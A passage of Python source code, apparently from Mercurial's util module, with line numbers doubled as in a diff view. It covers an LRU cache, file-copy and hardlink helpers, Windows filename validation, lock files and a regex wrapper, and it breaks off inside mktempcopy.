1439 1439 self.totalcost -= node.cost
1440 1440 node.value = v
1441 1441 node.cost = cost
1442 1442 self.totalcost += cost
1443 1443 self._movetohead(node)
1444 1444
1445 1445 if self.maxcost:
1446 1446 self._enforcecostlimit()
1447 1447
1448 1448 return
1449 1449
1450 1450 if self._size < self.capacity:
1451 1451 node = self._addcapacity()
1452 1452 else:
1453 1453 # Grab the last/oldest item.
1454 1454 node = self._head.prev
1455 1455
1456 1456 # At capacity. Kill the old entry.
1457 1457 if node.key is not _notset:
1458 1458 self.totalcost -= node.cost
1459 1459 del self._cache[node.key]
1460 1460
1461 1461 node.key = k
1462 1462 node.value = v
1463 1463 node.cost = cost
1464 1464 self.totalcost += cost
1465 1465 self._cache[k] = node
1466 1466 # And mark it as newest entry. No need to adjust order since it
1467 1467 # is already self._head.prev.
1468 1468 self._head = node
1469 1469
1470 1470 if self.maxcost:
1471 1471 self._enforcecostlimit()
1472 1472
1473 1473 def __setitem__(self, k, v):
1474 1474 self.insert(k, v)
1475 1475
1476 1476 def __delitem__(self, k):
1477 1477 self.pop(k)
1478 1478
1479 1479 def pop(self, k, default=_notset):
1480 1480 try:
1481 1481 node = self._cache.pop(k)
1482 1482 except KeyError:
1483 1483 if default is _notset:
1484 1484 raise
1485 1485 return default
1486 1486 value = node.value
1487 1487 self.totalcost -= node.cost
1488 1488 node.markempty()
1489 1489
1490 1490 # Temporarily mark as newest item before re-adjusting head to make
1491 1491 # this node the oldest item.
1492 1492 self._movetohead(node)
1493 1493 self._head = node.next
1494 1494
1495 1495 return value
1496 1496
1497 1497 # Additional dict methods.
1498 1498
1499 1499 def get(self, k, default=None):
1500 1500 try:
1501 1501 return self.__getitem__(k)
1502 1502 except KeyError:
1503 1503 return default
1504 1504
1505 1505 def peek(self, k, default=_notset):
1506 1506 """Get the specified item without moving it to the head
1507 1507
1508 1508 Unlike get(), this doesn't mutate the internal state. But be aware
1509 1509 that this doesn't make peek() thread safe.
1510 1510 """
1511 1511 try:
1512 1512 node = self._cache[k]
1513 1513 return node.value
1514 1514 except KeyError:
1515 1515 if default is _notset:
1516 1516 raise
1517 1517 return default
1518 1518
1519 1519 def clear(self):
1520 1520 n = self._head
1521 1521 while n.key is not _notset:
1522 1522 self.totalcost -= n.cost
1523 1523 n.markempty()
1524 1524 n = n.next
1525 1525
1526 1526 self._cache.clear()
1527 1527
1528 1528 def copy(self, capacity=None, maxcost=0):
1529 1529 """Create a new cache as a copy of the current one.
1530 1530
1531 1531 By default, the new cache has the same capacity as the existing one.
1532 1532 But, the cache capacity can be changed as part of performing the
1533 1533 copy.
1534 1534
1535 1535 Items in the copy have an insertion/access order matching this
1536 1536 instance.
1537 1537 """
1538 1538
1539 1539 capacity = capacity or self.capacity
1540 1540 maxcost = maxcost or self.maxcost
1541 1541 result = lrucachedict(capacity, maxcost=maxcost)
1542 1542
1543 1543 # We copy entries by iterating in oldest-to-newest order so the copy
1544 1544 # has the correct ordering.
1545 1545
1546 1546 # Find the first non-empty entry.
1547 1547 n = self._head.prev
1548 1548 while n.key is _notset and n is not self._head:
1549 1549 n = n.prev
1550 1550
1551 1551 # We could potentially skip the first N items when decreasing capacity.
1552 1552 # But let's keep it simple unless it is a performance problem.
1553 1553 for i in range(len(self._cache)):
1554 1554 result.insert(n.key, n.value, cost=n.cost)
1555 1555 n = n.prev
1556 1556
1557 1557 return result
1558 1558
1559 1559 def popoldest(self):
1560 1560 """Remove the oldest item from the cache.
1561 1561
1562 1562 Returns the (key, value) describing the removed cache entry.
1563 1563 """
1564 1564 if not self._cache:
1565 1565 return
1566 1566
1567 1567 # Walk the linked list backwards starting at tail node until we hit
1568 1568 # a non-empty node.
1569 1569 n = self._head.prev
1570 1570 while n.key is _notset:
1571 1571 n = n.prev
1572 1572
1573 1573 key, value = n.key, n.value
1574 1574
1575 1575 # And remove it from the cache and mark it as empty.
1576 1576 del self._cache[n.key]
1577 1577 self.totalcost -= n.cost
1578 1578 n.markempty()
1579 1579
1580 1580 return key, value
1581 1581
1582 1582 def _movetohead(self, node):
1583 1583 """Mark a node as the newest, making it the new head.
1584 1584
1585 1585 When a node is accessed, it becomes the freshest entry in the LRU
1586 1586 list, which is denoted by self._head.
1587 1587
1588 1588 Visually, let's make ``N`` the new head node (* denotes head):
1589 1589
1590 1590 previous/oldest <-> head <-> next/next newest
1591 1591
1592 1592 ----<->--- A* ---<->-----
1593 1593 | |
1594 1594 E <-> D <-> N <-> C <-> B
1595 1595
1596 1596 To:
1597 1597
1598 1598 ----<->--- N* ---<->-----
1599 1599 | |
1600 1600 E <-> D <-> C <-> B <-> A
1601 1601
1602 1602 This requires the following moves:
1603 1603
1604 1604 C.next = D (node.prev.next = node.next)
1605 1605 D.prev = C (node.next.prev = node.prev)
1606 1606 E.next = N (head.prev.next = node)
1607 1607 N.prev = E (node.prev = head.prev)
1608 1608 N.next = A (node.next = head)
1609 1609 A.prev = N (head.prev = node)
1610 1610 """
1611 1611 head = self._head
1612 1612 # C.next = D
1613 1613 node.prev.next = node.next
1614 1614 # D.prev = C
1615 1615 node.next.prev = node.prev
1616 1616 # N.prev = E
1617 1617 node.prev = head.prev
1618 1618 # N.next = A
1619 1619 # It is tempting to do just "head" here, however if node is
1620 1620 # adjacent to head, this will do bad things.
1621 1621 node.next = head.prev.next
1622 1622 # E.next = N
1623 1623 node.next.prev = node
1624 1624 # A.prev = N
1625 1625 node.prev.next = node
1626 1626
1627 1627 self._head = node
1628 1628
1629 1629 def _addcapacity(self):
1630 1630 """Add a node to the circular linked list.
1631 1631
1632 1632 The new node is inserted before the head node.
1633 1633 """
1634 1634 head = self._head
1635 1635 node = _lrucachenode()
1636 1636 head.prev.next = node
1637 1637 node.prev = head.prev
1638 1638 node.next = head
1639 1639 head.prev = node
1640 1640 self._size += 1
1641 1641 return node
1642 1642
1643 1643 def _enforcecostlimit(self):
1644 1644 # This should run after an insertion. It should only be called if total
1645 1645 # cost limits are being enforced.
1646 1646 # The most recently inserted node is never evicted.
1647 1647 if len(self) <= 1 or self.totalcost <= self.maxcost:
1648 1648 return
1649 1649
1650 1650 # This is logically equivalent to calling popoldest() until we
1651 1651 # free up enough cost. We don't do that since popoldest() needs
1652 1652 # to walk the linked list and doing this in a loop would be
1653 1653 # quadratic. So we find the first non-empty node and then
1654 1654 # walk nodes until we free up enough capacity.
1655 1655 #
1656 1656 # If we only removed the minimum number of nodes to free enough
1657 1657 # cost at insert time, chances are high that the next insert would
1658 1658 # also require pruning. This would effectively constitute quadratic
1659 1659 # behavior for insert-heavy workloads. To mitigate this, we set a
1660 1660 # target cost that is a percentage of the max cost. This will tend
1661 1661 # to free more nodes when the high water mark is reached, which
1662 1662 # lowers the chances of needing to prune on the subsequent insert.
1663 1663 targetcost = int(self.maxcost * 0.75)
1664 1664
1665 1665 n = self._head.prev
1666 1666 while n.key is _notset:
1667 1667 n = n.prev
1668 1668
1669 1669 while len(self) > 1 and self.totalcost > targetcost:
1670 1670 del self._cache[n.key]
1671 1671 self.totalcost -= n.cost
1672 1672 n.markempty()
1673 1673 n = n.prev
1674 1674
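# Editor's example (illustrative): with a maxcost, inserting past the
# limit evicts from the oldest end down to ~75% of maxcost.
_d = lrucachedict(4, maxcost=100)
_d.insert(b'a', b'value', cost=60)
_d.insert(b'b', b'value', cost=60)  # total cost 120 > 100: b'a' is evicted
assert b'a' not in _d and b'b' in _d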
1675 1675
1676 1676 def lrucachefunc(func):
1677 1677 '''cache most recent results of function calls'''
1678 1678 cache = {}
1679 1679 order = collections.deque()
1680 1680 if func.__code__.co_argcount == 1:
1681 1681
1682 1682 def f(arg):
1683 1683 if arg not in cache:
1684 1684 if len(cache) > 20:
1685 1685 del cache[order.popleft()]
1686 1686 cache[arg] = func(arg)
1687 1687 else:
1688 1688 order.remove(arg)
1689 1689 order.append(arg)
1690 1690 return cache[arg]
1691 1691
1692 1692 else:
1693 1693
1694 1694 def f(*args):
1695 1695 if args not in cache:
1696 1696 if len(cache) > 20:
1697 1697 del cache[order.popleft()]
1698 1698 cache[args] = func(*args)
1699 1699 else:
1700 1700 order.remove(args)
1701 1701 order.append(args)
1702 1702 return cache[args]
1703 1703
1704 1704 return f
1705 1705
1706 1706
1707 1707 class propertycache(object):
1708 1708 def __init__(self, func):
1709 1709 self.func = func
1710 1710 self.name = func.__name__
1711 1711
1712 1712 def __get__(self, obj, type=None):
1713 1713 result = self.func(obj)
1714 1714 self.cachevalue(obj, result)
1715 1715 return result
1716 1716
1717 1717 def cachevalue(self, obj, value):
1718 1718 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1719 1719 obj.__dict__[self.name] = value
1720 1720
1721 1721
1722 1722 def clearcachedproperty(obj, prop):
1723 1723 '''clear a cached property value, if one has been set'''
1724 1724 prop = pycompat.sysstr(prop)
1725 1725 if prop in obj.__dict__:
1726 1726 del obj.__dict__[prop]
1727 1727
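# Editor's example (illustrative): the descriptor runs once, cachevalue()
# stores the result in the instance __dict__, and clearcachedproperty()
# forces the next access to recompute.
class _repo(object):
    @propertycache
    def expensive(self):
        print('computing')
        return 42

_r = _repo()
_r.expensive  # prints 'computing'
_r.expensive  # served straight from _r.__dict__
clearcachedproperty(_r, b'expensive')  # next access recomputes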
1728 1728
1729 1729 def increasingchunks(source, min=1024, max=65536):
1730 1730 '''return no less than min bytes per chunk while data remains,
1731 1731 doubling min after each chunk until it reaches max'''
1732 1732
1733 1733 def log2(x):
1734 1734 if not x:
1735 1735 return 0
1736 1736 i = 0
1737 1737 while x:
1738 1738 x >>= 1
1739 1739 i += 1
1740 1740 return i - 1
1741 1741
1742 1742 buf = []
1743 1743 blen = 0
1744 1744 for chunk in source:
1745 1745 buf.append(chunk)
1746 1746 blen += len(chunk)
1747 1747 if blen >= min:
1748 1748 if min < max:
1749 1749 min = min << 1
1750 1750 nmin = 1 << log2(blen)
1751 1751 if nmin > min:
1752 1752 min = nmin
1753 1753 if min > max:
1754 1754 min = max
1755 1755 yield b''.join(buf)
1756 1756 blen = 0
1757 1757 buf = []
1758 1758 if buf:
1759 1759 yield b''.join(buf)
1760 1760
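# Editor's example (illustrative): many small chunks are coalesced into
# progressively larger ones, cutting per-chunk overhead when streaming.
_sizes = [len(c) for c in increasingchunks([b'x' * 512] * 8)]
assert _sizes == [1024, 2048, 1024]  # min doubles after each yielded chunk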
1761 1761
1762 1762 def always(fn):
1763 1763 return True
1764 1764
1765 1765
1766 1766 def never(fn):
1767 1767 return False
1768 1768
1769 1769
1770 1770 def nogc(func):
1771 1771 """disable garbage collector
1772 1772
1773 1773 Python's garbage collector triggers a GC each time a certain number of
1774 1774 container objects (the number being defined by gc.get_threshold()) are
1775 1775 allocated even when marked not to be tracked by the collector. Tracking has
1776 1776 no effect on when GCs are triggered, only on what objects the GC looks
1777 1777 into. As a workaround, disable GC while building complex (huge)
1778 1778 containers.
1779 1779
1780 1780 This garbage collector issue has been fixed in 2.7. But it still affects
1781 1781 CPython's performance.
1782 1782 """
1783 1783
1784 1784 def wrapper(*args, **kwargs):
1785 1785 gcenabled = gc.isenabled()
1786 1786 gc.disable()
1787 1787 try:
1788 1788 return func(*args, **kwargs)
1789 1789 finally:
1790 1790 if gcenabled:
1791 1791 gc.enable()
1792 1792
1793 1793 return wrapper
1794 1794
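# Editor's example (illustrative): suspend the cyclic GC while building a
# huge container, then restore its previous state on the way out.
@nogc
def _buildmap(items):
    return {k: [k] for k in items}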
1795 1795
1796 1796 if pycompat.ispypy:
1797 1797 # PyPy runs slower with gc disabled
1798 1798 nogc = lambda x: x
1799 1799
1800 1800
1801 1801 def pathto(root, n1, n2):
1802 1802 '''return the relative path from one place to another.
1803 1803 root should use os.sep to separate directories
1804 1804 n1 should use os.sep to separate directories
1805 1805 n2 should use "/" to separate directories
1806 1806 returns an os.sep-separated path.
1807 1807
1808 1808 If n1 is a relative path, it's assumed it's
1809 1809 relative to root.
1810 1810 n2 should always be relative to root.
1811 1811 '''
1812 1812 if not n1:
1813 1813 return localpath(n2)
1814 1814 if os.path.isabs(n1):
1815 1815 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1816 1816 return os.path.join(root, localpath(n2))
1817 1817 n2 = b'/'.join((pconvert(root), n2))
1818 1818 a, b = splitpath(n1), n2.split(b'/')
1819 1819 a.reverse()
1820 1820 b.reverse()
1821 1821 while a and b and a[-1] == b[-1]:
1822 1822 a.pop()
1823 1823 b.pop()
1824 1824 b.reverse()
1825 1825 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1826 1826
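# Editor's example (illustrative, POSIX separators assumed):
assert pathto(b'/repo', b'a/b', b'a/c/f') == b'../c/f'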
1827 1827
1828 1828 # the location of data files matching the source code
1829 1829 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != b'macosx_app':
1830 1830 # executable version (py2exe) doesn't support __file__
1831 1831 datapath = os.path.dirname(pycompat.sysexecutable)
1832 1832 else:
1833 1833 datapath = os.path.dirname(pycompat.fsencode(__file__))
1834 1834
1835 1835 i18n.setdatapath(datapath)
1836 1836
1837 1837
1838 1838 def checksignature(func):
1839 1839 '''wrap a function with code to check for calling errors'''
1840 1840
1841 1841 def check(*args, **kwargs):
1842 1842 try:
1843 1843 return func(*args, **kwargs)
1844 1844 except TypeError:
1845 1845 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1846 1846 raise error.SignatureError
1847 1847 raise
1848 1848
1849 1849 return check
1850 1850
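# Editor's example (illustrative): a wrong arity at the call boundary is
# reported as SignatureError, while TypeErrors raised deeper inside the
# wrapped function still propagate unchanged.
@checksignature
def _greet(name):
    return b'hello ' + name

_greet(b'a', b'b')  # raises error.SignatureError instead of TypeError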
1851 1851
1852 1852 # a whitelist of known filesystems where hardlinks work reliably
1853 1853 _hardlinkfswhitelist = {
1854 1854 b'apfs',
1855 1855 b'btrfs',
1856 1856 b'ext2',
1857 1857 b'ext3',
1858 1858 b'ext4',
1859 1859 b'hfs',
1860 1860 b'jfs',
1861 1861 b'NTFS',
1862 1862 b'reiserfs',
1863 1863 b'tmpfs',
1864 1864 b'ufs',
1865 1865 b'xfs',
1866 1866 b'zfs',
1867 1867 }
1868 1868
1869 1869
1870 1870 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1871 1871 '''copy a file, preserving mode and optionally other stat info like
1872 1872 atime/mtime
1873 1873
1874 1874 checkambig argument is used with filestat, and is useful only if
1875 1875 destination file is guarded by any lock (e.g. repo.lock or
1876 1876 repo.wlock).
1877 1877
1878 1878 copystat and checkambig should be exclusive.
1879 1879 '''
1880 1880 assert not (copystat and checkambig)
1881 1881 oldstat = None
1882 1882 if os.path.lexists(dest):
1883 1883 if checkambig:
1884 1884 oldstat = checkambig and filestat.frompath(dest)
1885 1885 unlink(dest)
1886 1886 if hardlink:
1887 1887 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1888 1888 # unless we are confident that dest is on a whitelisted filesystem.
1889 1889 try:
1890 1890 fstype = getfstype(os.path.dirname(dest))
1891 1891 except OSError:
1892 1892 fstype = None
1893 1893 if fstype not in _hardlinkfswhitelist:
1894 1894 hardlink = False
1895 1895 if hardlink:
1896 1896 try:
1897 1897 oslink(src, dest)
1898 1898 return
1899 1899 except (IOError, OSError):
1900 1900 pass # fall back to normal copy
1901 1901 if os.path.islink(src):
1902 1902 os.symlink(os.readlink(src), dest)
1903 1903 # copytime is ignored for symlinks, but in general copytime isn't needed
1904 1904 # for them anyway
1905 1905 else:
1906 1906 try:
1907 1907 shutil.copyfile(src, dest)
1908 1908 if copystat:
1909 1909 # copystat also copies mode
1910 1910 shutil.copystat(src, dest)
1911 1911 else:
1912 1912 shutil.copymode(src, dest)
1913 1913 if oldstat and oldstat.stat:
1914 1914 newstat = filestat.frompath(dest)
1915 1915 if newstat.isambig(oldstat):
1916 1916 # stat of copied file is ambiguous to original one
1917 1917 advanced = (
1918 1918 oldstat.stat[stat.ST_MTIME] + 1
1919 1919 ) & 0x7FFFFFFF
1920 1920 os.utime(dest, (advanced, advanced))
1921 1921 except shutil.Error as inst:
1922 1922 raise error.Abort(str(inst))
1923 1923
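# Editor's example (illustrative; paths are hypothetical): try a hardlink
# first, silently falling back to a plain copy when the destination
# filesystem is not on the whitelist or linking fails.
copyfile(b'source.txt', b'dest.txt', hardlink=True)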
1924 1924
1925 1925 def copyfiles(src, dst, hardlink=None, progress=None):
1926 1926 """Copy a directory tree using hardlinks if possible."""
1927 1927 num = 0
1928 1928
1929 1929 def settopic():
1930 1930 if progress:
1931 1931 progress.topic = _(b'linking') if hardlink else _(b'copying')
1932 1932
1933 1933 if os.path.isdir(src):
1934 1934 if hardlink is None:
1935 1935 hardlink = (
1936 1936 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1937 1937 )
1938 1938 settopic()
1939 1939 os.mkdir(dst)
1940 1940 for name, kind in listdir(src):
1941 1941 srcname = os.path.join(src, name)
1942 1942 dstname = os.path.join(dst, name)
1943 1943 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1944 1944 num += n
1945 1945 else:
1946 1946 if hardlink is None:
1947 1947 hardlink = (
1948 1948 os.stat(os.path.dirname(src)).st_dev
1949 1949 == os.stat(os.path.dirname(dst)).st_dev
1950 1950 )
1951 1951 settopic()
1952 1952
1953 1953 if hardlink:
1954 1954 try:
1955 1955 oslink(src, dst)
1956 1956 except (IOError, OSError):
1957 1957 hardlink = False
1958 1958 shutil.copy(src, dst)
1959 1959 else:
1960 1960 shutil.copy(src, dst)
1961 1961 num += 1
1962 1962 if progress:
1963 1963 progress.increment()
1964 1964
1965 1965 return hardlink, num
1966 1966
1967 1967
1968 1968 _winreservednames = {
1969 1969 b'con',
1970 1970 b'prn',
1971 1971 b'aux',
1972 1972 b'nul',
1973 1973 b'com1',
1974 1974 b'com2',
1975 1975 b'com3',
1976 1976 b'com4',
1977 1977 b'com5',
1978 1978 b'com6',
1979 1979 b'com7',
1980 1980 b'com8',
1981 1981 b'com9',
1982 1982 b'lpt1',
1983 1983 b'lpt2',
1984 1984 b'lpt3',
1985 1985 b'lpt4',
1986 1986 b'lpt5',
1987 1987 b'lpt6',
1988 1988 b'lpt7',
1989 1989 b'lpt8',
1990 1990 b'lpt9',
1991 1991 }
1992 1992 _winreservedchars = b':*?"<>|'
1993 1993
1994 1994
1995 1995 def checkwinfilename(path):
1996 1996 r'''Check that the base-relative path is a valid filename on Windows.
1997 1997 Returns None if the path is ok, or a UI string describing the problem.
1998 1998
1999 1999 >>> checkwinfilename(b"just/a/normal/path")
2000 2000 >>> checkwinfilename(b"foo/bar/con.xml")
2001 2001 "filename contains 'con', which is reserved on Windows"
2002 2002 >>> checkwinfilename(b"foo/con.xml/bar")
2003 2003 "filename contains 'con', which is reserved on Windows"
2004 2004 >>> checkwinfilename(b"foo/bar/xml.con")
2005 2005 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2006 2006 "filename contains 'AUX', which is reserved on Windows"
2007 2007 >>> checkwinfilename(b"foo/bar/bla:.txt")
2008 2008 "filename contains ':', which is reserved on Windows"
2009 2009 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2010 2010 "filename contains '\\x07', which is invalid on Windows"
2011 2011 >>> checkwinfilename(b"foo/bar/bla ")
2012 2012 "filename ends with ' ', which is not allowed on Windows"
2013 2013 >>> checkwinfilename(b"../bar")
2014 2014 >>> checkwinfilename(b"foo\\")
2015 2015 "filename ends with '\\', which is invalid on Windows"
2016 2016 >>> checkwinfilename(b"foo\\/bar")
2017 2017 "directory name ends with '\\', which is invalid on Windows"
2018 2018 '''
2019 2019 if path.endswith(b'\\'):
2020 2020 return _(b"filename ends with '\\', which is invalid on Windows")
2021 2021 if b'\\/' in path:
2022 2022 return _(b"directory name ends with '\\', which is invalid on Windows")
2023 2023 for n in path.replace(b'\\', b'/').split(b'/'):
2024 2024 if not n:
2025 2025 continue
2026 2026 for c in _filenamebytestr(n):
2027 2027 if c in _winreservedchars:
2028 2028 return (
2029 2029 _(
2030 2030 b"filename contains '%s', which is reserved "
2031 2031 b"on Windows"
2032 2032 )
2033 2033 % c
2034 2034 )
2035 2035 if ord(c) <= 31:
2036 2036 return _(
2037 2037 b"filename contains '%s', which is invalid " b"on Windows"
2038 2038 ) % stringutil.escapestr(c)
2039 2039 base = n.split(b'.')[0]
2040 2040 if base and base.lower() in _winreservednames:
2041 2041 return (
2042 2042 _(b"filename contains '%s', which is reserved " b"on Windows")
2043 2043 % base
2044 2044 )
2045 2045 t = n[-1:]
2046 2046 if t in b'. ' and n not in b'..':
2047 2047 return (
2048 2048 _(
2049 2049 b"filename ends with '%s', which is not allowed "
2050 2050 b"on Windows"
2051 2051 )
2052 2052 % t
2053 2053 )
2054 2054
2055 2055
2056 2056 if pycompat.iswindows:
2057 2057 checkosfilename = checkwinfilename
2058 2058 timer = time.clock
2059 2059 else:
2060 2060 checkosfilename = platform.checkosfilename
2061 2061 timer = time.time
2062 2062
2063 2063 if safehasattr(time, "perf_counter"):
2064 2064 timer = time.perf_counter
2065 2065
2066 2066
2067 2067 def makelock(info, pathname):
2068 2068 """Create a lock file atomically if possible
2069 2069
2070 2070 This may leave a stale lock file if symlink isn't supported and signal
2071 2071 interrupt is enabled.
2072 2072 """
2073 2073 try:
2074 2074 return os.symlink(info, pathname)
2075 2075 except OSError as why:
2076 2076 if why.errno == errno.EEXIST:
2077 2077 raise
2078 2078 except AttributeError: # no symlink in os
2079 2079 pass
2080 2080
2081 2081 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2082 2082 ld = os.open(pathname, flags)
2083 2083 os.write(ld, info)
2084 2084 os.close(ld)
2085 2085
2086 2086
2087 2087 def readlock(pathname):
2088 2088 try:
2089 2089 return readlink(pathname)
2090 2090 except OSError as why:
2091 2091 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2092 2092 raise
2093 2093 except AttributeError: # no symlink in os
2094 2094 pass
2095 2095 with posixfile(pathname, b'rb') as fp:
2096 2096 return fp.read()
2097 2097
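# Editorial sketch, not part of the original module: a minimal illustration of
# how makelock() and readlock() pair up. The lock path and info string are
# hypothetical and the helper is never called; real callers go through
# mercurial.lock instead.
def _examplemakelock(path=b'demo.lock'):
    makelock(b'hostname:12345', path)  # symlink if possible, else O_EXCL file
    try:
        # readlock() handles both the symlink and the plain-file fallback
        assert readlock(path) == b'hostname:12345'
    finally:
        os.unlink(path)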
2098 2098
2099 2099 def fstat(fp):
2100 2100 '''stat file object that may not have fileno method.'''
2101 2101 try:
2102 2102 return os.fstat(fp.fileno())
2103 2103 except AttributeError:
2104 2104 return os.stat(fp.name)
2105 2105
2106 2106
2107 2107 # File system features
2108 2108
2109 2109
2110 2110 def fscasesensitive(path):
2111 2111 """
2112 2112 Return true if the given path is on a case-sensitive filesystem
2113 2113
2114 2114 Requires a path (like /foo/.hg) ending with a foldable final
2115 2115 directory component.
2116 2116 """
2117 2117 s1 = os.lstat(path)
2118 2118 d, b = os.path.split(path)
2119 2119 b2 = b.upper()
2120 2120 if b == b2:
2121 2121 b2 = b.lower()
2122 2122 if b == b2:
2123 2123 return True # no evidence against case sensitivity
2124 2124 p2 = os.path.join(d, b2)
2125 2125 try:
2126 2126 s2 = os.lstat(p2)
2127 2127 if s2 == s1:
2128 2128 return False
2129 2129 return True
2130 2130 except OSError:
2131 2131 return True
2132 2132
2133 2133
2134 2134 try:
2135 2135 import re2
2136 2136
2137 2137 _re2 = None
2138 2138 except ImportError:
2139 2139 _re2 = False
2140 2140
2141 2141
2142 2142 class _re(object):
2143 2143 def _checkre2(self):
2144 2144 global _re2
2145 2145 try:
2146 2146 # check if match works, see issue3964
2147 2147 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2148 2148 except ImportError:
2149 2149 _re2 = False
2150 2150
2151 2151 def compile(self, pat, flags=0):
2152 2152 '''Compile a regular expression, using re2 if possible
2153 2153
2154 2154 For best performance, use only re2-compatible regexp features. The
2155 2155 only flags from the re module that are re2-compatible are
2156 2156 IGNORECASE and MULTILINE.'''
2157 2157 if _re2 is None:
2158 2158 self._checkre2()
2159 2159 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2160 2160 if flags & remod.IGNORECASE:
2161 2161 pat = b'(?i)' + pat
2162 2162 if flags & remod.MULTILINE:
2163 2163 pat = b'(?m)' + pat
2164 2164 try:
2165 2165 return re2.compile(pat)
2166 2166 except re2.error:
2167 2167 pass
2168 2168 return remod.compile(pat, flags)
2169 2169
2170 2170 @propertycache
2171 2171 def escape(self):
2172 2172 '''Return the version of escape corresponding to self.compile.
2173 2173
2174 2174 This is imperfect because whether re2 or re is used for a particular
2175 2175 function depends on the flags, etc, but it's the best we can do.
2176 2176 '''
2177 2177 global _re2
2178 2178 if _re2 is None:
2179 2179 self._checkre2()
2180 2180 if _re2:
2181 2181 return re2.escape
2182 2182 else:
2183 2183 return remod.escape
2184 2184
2185 2185
2186 2186 re = _re()
2187 2187
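# Editorial sketch, not part of the original module: the `re` singleton above
# is meant as a drop-in for the stdlib module; only IGNORECASE and MULTILINE
# are translated into re2's inline flags, anything else falls back to remod.
# The pattern is hypothetical and the helper is never called.
def _examplerecompile():
    pat = re.compile(br'foo.*bar', remod.IGNORECASE)  # re2 when available
    return pat.match(b'FOO and bar') is not None  # -> True on either engine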
2188 2188 _fspathcache = {}
2189 2189
2190 2190
2191 2191 def fspath(name, root):
2192 2192 '''Get name in the case stored in the filesystem
2193 2193
2194 2194 The name should be relative to root, and be normcase-ed for efficiency.
2195 2195
2196 2196 Note that this function is unnecessary, and should not be
2197 2197 called, for case-sensitive filesystems (simply because it's expensive).
2198 2198
2199 2199 The root should be normcase-ed, too.
2200 2200 '''
2201 2201
2202 2202 def _makefspathcacheentry(dir):
2203 2203 return dict((normcase(n), n) for n in os.listdir(dir))
2204 2204
2205 2205 seps = pycompat.ossep
2206 2206 if pycompat.osaltsep:
2207 2207 seps = seps + pycompat.osaltsep
2208 2208 # Protect backslashes. This gets silly very quickly.
2209 2209     seps = seps.replace(b'\\', b'\\\\')
2210 2210 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2211 2211 dir = os.path.normpath(root)
2212 2212 result = []
2213 2213 for part, sep in pattern.findall(name):
2214 2214 if sep:
2215 2215 result.append(sep)
2216 2216 continue
2217 2217
2218 2218 if dir not in _fspathcache:
2219 2219 _fspathcache[dir] = _makefspathcacheentry(dir)
2220 2220 contents = _fspathcache[dir]
2221 2221
2222 2222 found = contents.get(part)
2223 2223 if not found:
2224 2224             # retry "once per directory" per "dirstate.walk", which
2225 2225             # may take place for each patch of "hg qpush", for example
2226 2226 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2227 2227 found = contents.get(part)
2228 2228
2229 2229 result.append(found or part)
2230 2230 dir = os.path.join(dir, part)
2231 2231
2232 2232 return b''.join(result)
2233 2233
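# Editorial sketch, not part of the original module: fspath() recovers the
# on-disk spelling of a normcase()d relative path. The paths are hypothetical,
# the result depends on what actually exists under root, and the call is only
# meaningful on case-insensitive filesystems. The helper is never called.
def _examplefspath():
    # if root contains an on-disk 'README.txt', a normcased query comes
    # back in the stored case:
    return fspath(b'readme.txt', b'/tmp/repo')  # -> b'README.txt'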
2234 2234
2235 2235 def checknlink(testfile):
2236 2236 '''check whether hardlink count reporting works properly'''
2237 2237
2238 2238 # testfile may be open, so we need a separate file for checking to
2239 2239 # work around issue2543 (or testfile may get lost on Samba shares)
2240 2240 f1, f2, fp = None, None, None
2241 2241 try:
2242 2242 fd, f1 = pycompat.mkstemp(
2243 2243 prefix=b'.%s-' % os.path.basename(testfile),
2244 2244 suffix=b'1~',
2245 2245 dir=os.path.dirname(testfile),
2246 2246 )
2247 2247 os.close(fd)
2248 2248 f2 = b'%s2~' % f1[:-2]
2249 2249
2250 2250 oslink(f1, f2)
2251 2251 # nlinks() may behave differently for files on Windows shares if
2252 2252 # the file is open.
2253 2253 fp = posixfile(f2)
2254 2254 return nlinks(f2) > 1
2255 2255 except OSError:
2256 2256 return False
2257 2257 finally:
2258 2258 if fp is not None:
2259 2259 fp.close()
2260 2260 for f in (f1, f2):
2261 2261 try:
2262 2262 if f is not None:
2263 2263 os.unlink(f)
2264 2264 except OSError:
2265 2265 pass
2266 2266
2267 2267
2268 2268 def endswithsep(path):
2269 2269 '''Check path ends with os.sep or os.altsep.'''
2270 2270 return (
2271 2271 path.endswith(pycompat.ossep)
2272 2272 or pycompat.osaltsep
2273 2273 and path.endswith(pycompat.osaltsep)
2274 2274 )
2275 2275
2276 2276
2277 2277 def splitpath(path):
2278 2278     '''Split path by os.sep.
2279 2279     Note that this function does not use os.altsep because it is
2280 2280     an alternative to a simple "xxx.split(os.sep)".
2281 2281     It is recommended to use os.path.normpath() before using this
2282 2282     function if needed.'''
2283 2283 return path.split(pycompat.ossep)
2284 2284
2285 2285
2286 2286 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2287 2287 """Create a temporary file with the same contents from name
2288 2288
2289 2289 The permission bits are copied from the original file.
2290 2290
2291 2291 If the temporary file is going to be truncated immediately, you
2292 2292 can use emptyok=True as an optimization.
2293 2293
2294 2294 Returns the name of the temporary file.
2295 2295 """
2296 2296 d, fn = os.path.split(name)
2297 2297 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2298 2298 os.close(fd)
2299 2299 # Temporary files are created with mode 0600, which is usually not
2300 2300 # what we want. If the original file already exists, just copy
2301 2301 # its mode. Otherwise, manually obey umask.
2302 2302 copymode(name, temp, createmode, enforcewritable)
2303 2303
2304 2304 if emptyok:
2305 2305 return temp
2306 2306 try:
2307 2307 try:
2308 2308 ifp = posixfile(name, b"rb")
